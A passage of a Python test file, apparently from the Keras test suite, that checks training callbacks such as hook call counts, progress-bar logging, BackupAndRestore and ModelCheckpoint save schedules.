('with_sequence', _get_sequence()))
def test_callback_hooks_are_called_in_fit(self, data):
if not tf.executing_eagerly():
self.skipTest('Behavior changed in v2.')
x, y = data
val_x, val_y = np.ones((4, 10)), np.ones((4, 1))
model = self._get_model()
counter = Counter()
model.fit(
x,
y,
validation_data=(val_x, val_y),
batch_size=2,
steps_per_epoch=5,
epochs=5,
callbacks=[counter])
self._check_counts(
counter, {
'on_batch_begin': 25,
'on_batch_end': 25,
'on_epoch_begin': 5,
'on_epoch_end': 5,
'on_predict_batch_begin': 0,
'on_predict_batch_end': 0,
'on_predict_begin': 0,
'on_predict_end': 0,
'on_test_batch_begin': 10,
'on_test_batch_end': 10,
'on_test_begin': 5,
'on_test_end': 5,
'on_train_batch_begin': 25,
'on_train_batch_end': 25,
'on_train_begin': 1,
'on_train_end': 1
})
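    # For reference: steps_per_epoch=5 over 5 epochs gives 25 training batches,
    # so the train-batch hooks and their legacy on_batch_* aliases fire 25
    # times; the 4 validation samples are evaluated in 2 batches per epoch,
    # giving 10 test-batch calls and one on_test_begin/on_test_end per epoch.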
@parameterized.named_parameters(('with_numpy', _get_numpy()),
('with_sequence', _get_sequence()))
def test_callback_hooks_are_called_in_evaluate(self, data):
x, y = data
is_sequence = isinstance(x, keras.utils.data_utils.Sequence)
model = self._get_model()
counter = Counter()
model.evaluate(
x,
y,
batch_size=2 if not is_sequence else None,
steps=5 if is_sequence else None,
callbacks=[counter])
self._check_counts(
counter, {
'on_test_batch_begin': 5,
'on_test_batch_end': 5,
'on_test_begin': 1,
'on_test_end': 1
})
@parameterized.named_parameters(('with_numpy', _get_numpy()),
('with_sequence', _get_sequence()))
def test_callback_hooks_are_called_in_predict(self, data):
x = data[0]
is_sequence = isinstance(x, keras.utils.data_utils.Sequence)
model = self._get_model()
counter = Counter()
model.predict(
x,
batch_size=2 if not is_sequence else None,
steps=5 if is_sequence else None,
callbacks=[counter])
self._check_counts(
counter, {
'on_predict_batch_begin': 5,
'on_predict_batch_end': 5,
'on_predict_begin': 1,
'on_predict_end': 1
})
def test_callback_list_methods(self):
counter = Counter()
callback_list = keras.callbacks.CallbackList([counter])
batch = 0
callback_list.on_test_batch_begin(batch)
callback_list.on_test_batch_end(batch)
callback_list.on_predict_batch_begin(batch)
callback_list.on_predict_batch_end(batch)
self._check_counts(
counter, {
'on_test_batch_begin': 1,
'on_test_batch_end': 1,
'on_predict_batch_begin': 1,
'on_predict_batch_end': 1
})
class KerasCallbacksTest(keras_parameterized.TestCase):
def _get_model(self, input_shape=None, additional_metrics=None):
additional_metrics = additional_metrics or []
layers = [
keras.layers.Dense(3, activation='relu'),
keras.layers.Dense(2, activation='softmax')
]
model = testing_utils.get_model_from_layers(layers, input_shape=input_shape)
model.compile(
loss='mse',
optimizer='rmsprop',
metrics=[keras.metrics.CategoricalAccuracy(name='my_acc')] +
additional_metrics,
run_eagerly=testing_utils.should_run_eagerly())
return model
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes
def test_progbar_logging(self):
model = self._get_model(input_shape=(3,))
x = tf.ones((200, 3))
y = tf.zeros((200, 2))
dataset = tf.data.Dataset.from_tensor_slices((x, y)).batch(10)
expected_log = r'(.*- loss:.*- my_acc:.*)+'
io_utils.enable_interactive_logging()
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(dataset, epochs=2, steps_per_epoch=10)
self.assertRegex(printed.contents(), expected_log)
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes
def test_progbar_logging_with_stateful_metrics(self):
class AddAllOnes(keras.metrics.Metric):
"""A simple metric that adds all the one's in `y_true`."""
def __init__(self, name='add_all_ones', **kwargs):
super(AddAllOnes, self).__init__(name=name, **kwargs)
self.total = self.add_weight(name='total', initializer='zeros')
def update_state(self, y_true, y_pred, sample_weight=None):
self.total.assign_add(
tf.cast(tf.reduce_sum(y_true), dtype=tf.float32))
def result(self):
return self.total
x_train = np.array([[0, 1, 0, 1, 0, 1, 0, 1]] * 8).astype(float)
y_train = np.array([[1, 0], [0, 0], [1, 1], [1, 0], [0, 1], [1, 0], [1, 0],
[0, 0]])
# There are 7 ones in total in `y_train` after two batches.
expected_log = r'(.*- loss:.*- my_acc:.*- add_all_ones: 7.0000)+'
io_utils.enable_interactive_logging()
with self.captureWritesToStream(sys.stdout) as printed:
model = self._get_model(
input_shape=(8,), additional_metrics=[AddAllOnes()])
model.fit(x_train, y_train, verbose=1, batch_size=4, shuffle=False)
self.assertRegex(printed.contents(), expected_log)
    # When not executing eagerly, `model.evaluate` does not print the metric
    # results.
if tf.executing_eagerly():
with self.captureWritesToStream(sys.stdout) as printed:
model = self._get_model(
input_shape=(8,), additional_metrics=[AddAllOnes()])
model.evaluate(x_train, y_train, verbose=1, batch_size=4)
self.assertRegex(printed.contents(), expected_log)
@keras_parameterized.run_all_keras_modes
def test_trivial_backup_restore(self):
if testing_utils.should_run_eagerly():
model = keras.Sequential([keras.layers.Dense(1)])
model.compile('sgd', 'mse')
cbk = BackupAndRestore(self.get_temp_dir())
model.fit(np.ones((10, 1)), np.ones((10, 1)), epochs=0, callbacks=[cbk])
def test_backup_restore_train_counter(self):
if not tf.compat.v1.executing_eagerly():
      self.skipTest(
          'BackupAndRestore only available when eager execution is enabled')
model = keras.Sequential([keras.layers.Dense(1)])
model.compile('sgd', 'mse')
cbk = BackupAndRestore(self.get_temp_dir())
class InterruptingCallback(keras.callbacks.Callback):
"""A callback to intentionally introduce interruption to training."""
def on_epoch_end(self, epoch, log=None):
logging.info(f'counter: {model._train_counter}')
if epoch == 5 or epoch == 12:
raise RuntimeError('Interruption')
log_dir = self.get_temp_dir()
# The following asserts that the train counter is fault tolerant.
self.assertEqual(model._train_counter.numpy(), 0)
try:
model.fit(np.ones((10, 1)), np.ones((10, 1)), epochs=20,
callbacks=[cbk, InterruptingCallback()])
except RuntimeError:
pass
self.assertEqual(model._train_counter.numpy(), 6)
try:
model.fit(np.ones((10, 1)), np.ones((10, 1)), epochs=20,
callbacks=[cbk, InterruptingCallback()])
except RuntimeError:
pass
self.assertEqual(model._train_counter.numpy(), 13)
def _test_backup_and_restore_callback_with(self, cls):
if not tf.compat.v1.executing_eagerly():
      self.skipTest(
          'BackupAndRestore only available when eager execution is enabled')
class InterruptingCallback(keras.callbacks.Callback):
"""A callback to intentionally introduce interruption to training."""
def on_epoch_end(self, epoch, log=None):
if epoch == 15:
raise RuntimeError('Interruption')
model = keras.Sequential([keras.layers.Dense(10)])
optimizer = gradient_descent.SGD()
model.compile(optimizer, loss='mse')
x = tf.random.uniform((24, 10))
y = tf.random.uniform((24,))
dataset = tf.data.Dataset.from_tensor_slices((x, y)).repeat().batch(2)
backup_callback = cls(backup_dir=self.get_temp_dir())
try:
model.fit(
dataset,
epochs=20,
steps_per_epoch=5,
callbacks=[backup_callback, InterruptingCallback()])
except RuntimeError:
logging.warning('***Handling interruption***')
# This continues at the epoch where it left off.
model.fit(
dataset, epochs=20, steps_per_epoch=5, callbacks=[backup_callback])
def test_experimental_backup_and_restore(self):
"""Ensure the legacy endpoint of `BackupAndRestore` gives warning."""
warning_messages = []
def warning(msg):
warning_messages.append(msg)
with tf.compat.v1.test.mock.patch.object(logging, 'warning', warning):
self._test_backup_and_restore_callback_with(BackupAndRestoreExperimental)
warning_msg = ('`tf.keras.callbacks.experimental.BackupAndRestore` '
'endpoint is deprecated')
self.assertIn(warning_msg, '\n'.join(warning_messages))
warning_msg = ('***Handling interruption***')
self.assertIn(warning_msg, '\n'.join(warning_messages))
def test_backup_and_restore(self):
"""Ensure the public endpoint of `BackupAndRestore` is working."""
warning_messages = []
def warning(msg):
warning_messages.append(msg)
with tf.compat.v1.test.mock.patch.object(logging, 'warning', warning):
self._test_backup_and_restore_callback_with(BackupAndRestore)
warning_msg = ('`tf.keras.callbacks.experimental.BackupAndRestore` '
'endpoint is deprecated')
self.assertNotIn(warning_msg, '\n'.join(warning_messages))
warning_msg = ('***Handling interruption***')
self.assertIn(warning_msg, '\n'.join(warning_messages))
@keras_parameterized.run_all_keras_modes
def test_callback_warning(self):
class SleepCallback(keras.callbacks.Callback):
def on_train_batch_end(self, batch, logs=None):
time.sleep(0.1)
model = sequential.Sequential()
model.add(keras.layers.Dense(1))
model.compile(
'sgd',
loss='mse',
run_eagerly=testing_utils.should_run_eagerly())
warning_messages = []
def warning(msg):
warning_messages.append(msg)
with tf.compat.v1.test.mock.patch.object(logging, 'warning', warning):
model.fit(
np.ones((16, 1), 'float32'),
np.ones((16, 1), 'float32'),
batch_size=3,
epochs=1,
callbacks=[SleepCallback()])
warning_msg = ('Callback method `on_train_batch_end` is slow compared '
'to the batch time')
self.assertIn(warning_msg, '\n'.join(warning_messages))
@keras_parameterized.run_all_keras_modes
def test_default_callbacks_no_warning(self):
# Test that without the callback no warning is raised
model = sequential.Sequential()
model.add(keras.layers.Dense(1))
model.compile(
'sgd',
loss='mse',
run_eagerly=testing_utils.should_run_eagerly())
warning_messages = []
def warning(msg):
warning_messages.append(msg)
with tf.compat.v1.test.mock.patch.object(logging, 'warning', warning):
model.fit(
np.ones((16, 1), 'float32'),
np.ones((16, 1), 'float32'),
batch_size=3,
epochs=1)
self.assertListEqual(warning_messages, [])
@keras_parameterized.run_with_all_model_types(exclude_models='functional')
@keras_parameterized.run_all_keras_modes
def test_progbar_logging_deferred_model_build(self):
model = self._get_model()
self.assertFalse(model.built)
x = tf.ones((200, 3))
y = tf.zeros((200, 2))
dataset = tf.data.Dataset.from_tensor_slices((x, y)).batch(10)
expected_log = r'(.*- loss:.*- my_acc:.*)+'
io_utils.enable_interactive_logging()
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(dataset, epochs=2, steps_per_epoch=10)
self.assertRegex(printed.contents(), expected_log)
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes
def test_progbar_logging_validation_data(self):
model = self._get_model(input_shape=(3,))
x = tf.ones((50, 3))
y = tf.zeros((50, 2))
training_dataset = tf.data.Dataset.from_tensor_slices((x, y)).batch(10)
val_dataset = tf.data.Dataset.from_tensor_slices((x, y)).batch(10)
expected_log = r'(.*5/5.*- loss:.*- my_acc:.*- val_loss:.*- val_my_acc:.*)+'
io_utils.enable_interactive_logging()
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(training_dataset, epochs=2, validation_data=val_dataset)
self.assertRegex(printed.contents(), expected_log)
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_progbar_logging_validation_split(self):
model = self._get_model(input_shape=(3,))
x = np.ones((100, 3))
y = np.zeros((100, 2))
expected_log = (
r'(?s).*1/2.*8/8.*- loss:.*- my_acc:.*- val_loss:.*- val_my_acc:'
r'.*2/2.*8/8.*- loss:.*- my_acc:.*- val_loss:.*- val_my_acc:.*')
io_utils.enable_interactive_logging()
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(x, y, batch_size=10, epochs=2, validation_split=0.2)
self.assertRegex(printed.contents(), expected_log)
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_progbar_logging_training_validation(self):
model = self._get_model(input_shape=(2,))
def generator():
for _ in range(100):
yield [1, 1], 1
training = tf.data.Dataset \
.from_generator(
generator=generator,
output_types=('float64', 'float64'),
output_shapes=([2], [])) \
.batch(2) \
.repeat()
validation = tf.data.Dataset \
.from_generator(
generator=generator,
output_types=('float64', 'float64'),
output_shapes=([2], [])) \
.batch(2)
expected_log = (
r'(?s).*1/2.*20/20.*- loss:.*- my_acc:.*- val_loss:.*- val_my_acc:'
r'.*2/2.*20/20.*- loss:.*- my_acc:.*- val_loss:.*- val_my_acc:.*')
io_utils.enable_interactive_logging()
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(
x=training, validation_data=validation, epochs=2, steps_per_epoch=20)
self.assertRegex(printed.contents(), expected_log)
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_progbar_logging_with_dataset_and_partial_batch(self):
model = self._get_model(input_shape=(2,))
def generator():
# Have a partial batch at the end.
for _ in range(9):
yield np.random.random(2), 1
training = tf.data.Dataset \
.from_generator(
generator=generator,
output_types=('float64', 'float64'),
output_shapes=([2], [])) \
.batch(2)
validation = tf.data.Dataset \
.from_generator(
generator=generator,
output_types=('float64', 'float64'),
output_shapes=([2], [])) \
.batch(2)
io_utils.enable_interactive_logging()
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(x=training, validation_data=validation)
    # Make sure the values of the val_ metrics are not zero.
log_content = printed.contents()
val_loss = re.findall(r'val_loss: (\d\.\d+)', log_content)
self.assertLen(val_loss, 1)
self.assertGreater(float(val_loss[0]), 0.0)
@keras_parameterized.run_with_all_model_types
def test_ModelCheckpoint(self):
if h5py is None:
return # Skip test if models cannot be saved.
model_type = testing_utils.get_model_type()
if model_type == 'subclass':
return # Skip test since subclassed models cannot be saved in .h5 format.
if not tf.__internal__.tf2.enabled():
self.skipTest('Checkpoint callback only available in v2.')
layers = [
keras.layers.Dense(NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'),
keras.layers.Dense(NUM_CLASSES, activation='softmax')
]
model = testing_utils.get_model_from_layers(layers, input_shape=(3,))
model.compile(
loss='categorical_crossentropy', optimizer='rmsprop', metrics=['acc'])
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
filepath = os.path.join(temp_dir, 'checkpoint.h5')
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
# Case 1
monitor = 'val_loss'
save_best_only = False
mode = 'auto'
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# Case 2
mode = 'min'
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# Case 3
mode = 'max'
monitor = 'val_acc'
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# Case 4
save_best_only = True
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# Case 5: metric not available.
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor='unknown',
save_best_only=True)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
# File won't be written.
assert not os.path.exists(filepath)
# Case 6
save_best_only = False
period = 2
mode = 'auto'
filepath = os.path.join(temp_dir, 'checkpoint.{epoch:02d}.h5')
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
period=period)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=4,
verbose=1)
assert os.path.exists(filepath.format(epoch=2))
assert os.path.exists(filepath.format(epoch=4))
os.remove(filepath.format(epoch=2))
os.remove(filepath.format(epoch=4))
assert not os.path.exists(filepath.format(epoch=1))
assert not os.path.exists(filepath.format(epoch=3))
# Invalid use: this will raise a warning but not an Exception.
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode='unknown')
# Case 7: `ModelCheckpoint` with a combination of `save_freq` and `period`.
# Though `period` is deprecated, we're testing it for
# backward-compatibility.
filepath = os.path.join(temp_dir, 'checkpoint.epoch{epoch:02d}.h5')
cbks = [
keras.callbacks.ModelCheckpoint(
filepath, monitor=monitor, mode=mode, save_freq='epoch', period=5)
]
assert not os.path.exists(filepath.format(epoch=0))
assert not os.path.exists(filepath.format(epoch=5))
model.fit(
x_train,
y_train,
batch_size=2,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=10,
verbose=1)
assert not os.path.exists(filepath.format(epoch=1))
assert not os.path.exists(filepath.format(epoch=2))
assert not os.path.exists(filepath.format(epoch=3))
assert not os.path.exists(filepath.format(epoch=4))
assert os.path.exists(filepath.format(epoch=5))
assert not os.path.exists(filepath.format(epoch=6))
assert os.path.exists(filepath.format(epoch=10))
os.remove(filepath.format(epoch=5))
os.remove(filepath.format(epoch=10))
# Case 8: `ModelCheckpoint` with an integer `save_freq`
filepath = os.path.join(temp_dir, 'checkpoint.epoch{epoch:02d}.h5')
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
save_freq=15,
            period=100)  # `period` is ignored when `save_freq` is an integer.
]
assert not os.path.exists(filepath.format(epoch=3))
model.fit(
x_train,
y_train,
batch_size=2,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=10,
verbose=1)
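    # With 10 training samples and batch_size=2, each epoch is 5 batches, so an
    # integer save_freq=15 saves after global batches 15, 30 and 45, i.e. at
    # the end of epochs 3, 6 and 9, which the assertions below verify.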
assert not os.path.exists(filepath.format(epoch=1))
assert not os.path.exists(filepath.format(epoch=2))
assert os.path.exists(filepath.format(epoch=3))
assert not os.path.exists(filepath.format(epoch=4))
assert not os.path.exists(filepath.format(epoch=5))
assert os.path.exists(filepath.format(epoch=6))
assert not os.path.exists(filepath.format(epoch=7))
assert not os.path.exists(filepath.format(epoch=8))
assert os.path.exists(filepath.format(epoch=9))
os.remove(filepath.format(epoch=3))
os.remove(filepath.format(epoch=6))
os.remove(filepath.format(epoch=9))
# Case 9: `ModelCheckpoint` with valid and invalid save_freq argument.
with self.assertRaisesRegex(ValueError, 'Unrecognized save_freq'):
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
save_freq='invalid_save_freq')
# The following should not raise ValueError.
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
save_freq='epoch')
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
save_freq=3)
# Case 10: `ModelCheckpoint` with valid and invalid `options` argument.
with self.assertRaisesRegex(TypeError, 'tf.train.CheckpointOptions'):
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
save_weights_only=True,
mode=mode,
options=tf.saved_model.SaveOptions())
with self.assertRaisesRegex(TypeError, 'tf.saved_model.SaveOptions'):
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
save_weights_only=False,
mode=mode,
options=tf.train.CheckpointOptions())
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
save_weights_only=True,
mode=mode,
options=tf.train.CheckpointOptions())
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
save_weights_only=False,
mode=mode,
options=tf.saved_model.SaveOptions())
# Case 11: `ModelCheckpoint` save model with batch number in filename.
filepath = os.path.join(temp_dir,
'checkpoint.epoch{epoch:02d}batch{batch:02d}.h5')
cbks = [
keras.callbacks.ModelCheckpoint(filepath, monitor=monitor, save_freq=1)
]
assert not os.path.exists(filepath.format(epoch=1, batch=1))
assert not os.path.exists(filepath.format(epoch=1, batch=2))
assert not os.path.exists(filepath.format(epoch=2, batch=1))
assert not os.path.exists(filepath.format(epoch=2, batch=2))
assert not os.path.exists(filepath.format(epoch=3, batch=1))
assert not os.path.exists(filepath.format(epoch=3, batch=2))
assert not os.path.exists(filepath.format(epoch=4, batch=1))
assert not os.path.exists(filepath.format(epoch=4, batch=2))
assert not os.path.exists(filepath.format(epoch=5, batch=1))
assert not os.path.exists(filepath.format(epoch=5, batch=2))
model.fit(
x_train,
y_train,
batch_size=5,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=1)
assert os.path.exists(filepath.format(epoch=1, batch=1))
assert os.path.exists(filepath.format(epoch=1, batch=2))
assert os.path.exists(filepath.format(epoch=2, batch=1))
assert os.path.exists(filepath.format(epoch=2, batch=2))
assert os.path.exists(filepath.format(epoch=3, batch=1))
assert os.path.exists(filepath.format(epoch=3, batch=2))
assert os.path.exists(filepath.format(epoch=4, batch=1))
assert os.path.exists(filepath.format(epoch=4, batch=2))
assert os.path.exists(filepath.format(epoch=5, batch=1))
assert os.path.exists(filepath.format(epoch=5, batch=2))
os.remove(filepath.format(epoch=1, batch=1))
os.remove(filepath.format(epoch=1, batch=2))
os.remove(filepath.format(epoch=2, batch=1))
os.remove(filepath.format(epoch=2, batch=2))
os.remove(filepath.format(epoch=3, batch=1))
os.remove(filepath.format(epoch=3, batch=2))
os.remove(filepath.format(epoch=4, batch=1))
os.remove(filepath.format(epoch=4, batch=2))
os.remove(filepath.format(epoch=5, batch=1))
os.remove(filepath.format(epoch=5, batch=2))
# Case 12: ModelCheckpoint saves model with initial_value_threshold param
mode = 'max'
monitor = 'val_acc'
initial_value_threshold = 0
save_best_only = True
filepath = os.path.join(temp_dir, 'checkpoint.h5')
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
initial_value_threshold=initial_value_threshold,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# Case 13: ModelCheckpoint saves model with initial_value_threshold param
mode = 'auto'
monitor = 'val_loss'
initial_value_threshold = None
save_best_only = True
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
initial_value_threshold=initial_value_threshold,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
    # Case 14: ModelCheckpoint doesn't save model if loss was minimum earlier
mode = 'min'
monitor = 'val_loss'
initial_value_threshold = 0
save_best_only = True
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
initial_value_threshold=initial_value_threshold,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert not os.path.exists(filepath)
    # Case 15: ModelCheckpoint doesn't save model if loss was min earlier in auto
# mode
mode = 'auto'
monitor = 'val_loss'
initial_value_threshold = 0
save_best_only = True
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
initial_value_threshold=initial_value_threshold,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert not os.path.exists(filepath)
@testing_utils.run_v2_only
def test_ModelCheckpoint_subclass_save_weights_false(self):
model = testing_utils.get_small_subclass_mlp(NUM_HIDDEN, NUM_CLASSES)
model.compile(
loss='categorical_crossentropy', optimizer='rmsprop', metrics=['acc'])
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
filepath = os.path.join(temp_dir, 'checkpoint')
cbks = [keras.callbacks.ModelCheckpoint(
filepath, save_weights_only=False)]
(x_train, y_train), _ = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_train = np_utils.to_categorical(y_train, num_classes=NUM_CLASSES)
model.fit(
x_train,
y_train,
callbacks=cbks,
epochs=1,
verbose=0)
# Check that the filepath is a SavedModel directory.
self.assertIn('saved_model.pb', os.listdir(filepath))
def _get_dummy_resource_for_model_checkpoint_testing(self):
def get_input_datasets():
# Simple training input.
train_input = [[1.]] * 16
train_label = [[0.]] * 16
ds = tf.data.Dataset.from_tensor_slices((train_input, train_label))
return ds.batch(8, drop_remainder=True)
# Very simple bias model to eliminate randomness.
optimizer = gradient_descent.SGD(0.1)
model = sequential.Sequential()
model.add(testing_utils.Bias(input_shape=(1,)))
model.compile(loss='mae', optimizer=optimizer, metrics=['mae'])
train_ds = get_input_datasets()
temp_dir = self.get_temp_dir()
filepath = os.path.join(temp_dir, 'checkpoint.epoch{epoch:02d}.h5')
# The filepath shouldn't exist at the beginning.
self.assertFalse(os.path.exists(filepath))
callback = keras.callbacks.ModelCheckpoint(
filepath=filepath, save_weights_only=True)
return model, train_ds, callback, filepath
def _run_load_weights_on_restart_test_common_iterations(self):
(model, train_ds, callback,
filepath) = self._get_dummy_resource_for_model_checkpoint_testing()
initial_epochs = 3
model.fit(train_ds, epochs=initial_epochs, callbacks=[callback])
# The files should exist after fitting with callback.
for epoch in range(initial_epochs):
self.assertTrue(os.path.exists(filepath.format(epoch=epoch + 1)))
self.assertFalse(os.path.exists(filepath.format(epoch=initial_epochs + 1)))
self.assertEqual(
callback._get_most_recently_modified_file_matching_pattern(filepath),
filepath.format(epoch=initial_epochs))
model.fit(train_ds, epochs=1)
weights_after_one_more_epoch = model.get_weights()
# The filepath should continue to exist after fitting without callback.
for epoch in range(initial_epochs):
self.assertTrue(os.path.exists(filepath.format(epoch=epoch + 1)))
return model, train_ds, filepath, weights_after_one_more_epoch
@staticmethod
def get_ModelCheckpoint_load_weights_on_restart_true_test(save_weights_only):
def func(self):
(model, train_ds, filepath, weights_after_one_more_epoch
) = self._run_load_weights_on_restart_test_common_iterations()
# Sleep for some short time period ensuring the files are created with
# a different time (in MacOS OSS the granularity is only 1 second).
time.sleep(2)
callback = keras.callbacks.ModelCheckpoint(
filepath=filepath,
save_weights_only=save_weights_only,
load_weights_on_restart=True)
model.fit(train_ds, epochs=1, callbacks=[callback])
weights_after_model_restoring_and_one_more_epoch = model.get_weights()
self.assertEqual(
callback._get_most_recently_modified_file_matching_pattern(filepath),
filepath.format(epoch=1))
model.fit(
train_ds,
epochs=1,
callbacks=[
keras.callbacks.ModelCheckpoint(
filepath=filepath,
save_weights_only=save_weights_only,
load_weights_on_restart=True)
])
weights_with_one_final_extra_epoch = model.get_weights()
      # Asserting that the weights one epoch after the initial fitting and
      # another epoch after that are close, if a ModelCheckpoint with
      # load_weights_on_restart=True is given (so the model is restored at the
      # beginning of training).
self.assertAllClose(weights_after_one_more_epoch,
weights_after_model_restoring_and_one_more_epoch)
self.assertNotAllClose(weights_after_one_more_epoch,
weights_with_one_final_extra_epoch)
return func
@staticmethod
def get_ModelCheckpoint_load_weights_on_restart_false_test(save_weights_only):
def func(self):
(model, train_ds, filepath, weights_after_one_more_epoch
) = self._run_load_weights_on_restart_test_common_iterations()
model.fit(
train_ds,
epochs=1,
callbacks=[
keras.callbacks.ModelCheckpoint(
filepath=filepath, save_weights_only=save_weights_only)
])
weights_after_model_restoring_and_one_more_epoch = model.get_weights()
# Asserting the weights one epoch after initial fitting and another epoch
# after that are different, if a ModelCheckpoint with
# load_weights_on_restart=False is given (so the model is not restored at
# the beginning of training).
self.assertNotAllClose(weights_after_one_more_epoch,
weights_after_model_restoring_and_one_more_epoch)
return func
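  # The assignments below reach the underlying functions of the two static
  # factories above via `__func__` (a staticmethod object is not directly
  # callable inside the class body on older Python versions) and call them to
  # generate the four concrete test methods, one per
  # (load_weights_on_restart, save_weights_only) combination.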
test_model_checkpoint_load_weights_on_restart_true_save_weights_only_true = \
get_ModelCheckpoint_load_weights_on_restart_true_test.__func__(True)
test_model_checkpoint_load_weights_on_restart_true_save_weights_only_false = \
get_ModelCheckpoint_load_weights_on_restart_true_test.__func__(False)
test_model_checkpoint_load_weights_on_restart_false_save_weights_only_true = \
get_ModelCheckpoint_load_weights_on_restart_false_test.__func__(True)
test_model_checkpoint_load_weights_on_restart_false_save_weights_only_false \
= get_ModelCheckpoint_load_weights_on_restart_false_test.__func__(False)
def test_ModelCheckpoint_override_if_file_exist(self):
(model, train_ds, filepath,
_) = self._run_load_weights_on_restart_test_common_iterations()
# Sleep for some short time period to ensure the files are created with
# a different time (in MacOS OSS the granularity is only 1 second).
time.sleep(2)
callback = keras.callbacks.ModelCheckpoint(
filepath=filepath, save_weights_only=True)
model.load_weights(
callback._get_most_recently_modified_file_matching_pattern(filepath))
weights_before_additional_fit = model.get_weights()
model.fit(train_ds, epochs=1, callbacks=[callback])
model.load_weights(
callback._get_most_recently_modified_file_matching_pattern(filepath))
weights_after_additional_fit = model.get_weights()
self.assertNotAllClose(weights_before_additional_fit,
weights_after_additional_fit)
def test_fit_with_ModelCheckpoint_with_tf_config(self):
(model, train_ds, callback,
_) = self._get_dummy_resource_for_model_checkpoint_testing()
os.environ['TF_CONFIG'] = json.dumps({
'cluster': {
'worker': ['localhost:23333']
},
'task': {
'type': 'worker',
'index': 0
}
})
# `model.fit()` should work regardless of the presence of `TF_CONFIG`.
model.fit(train_ds, epochs=1, callbacks=[callback])
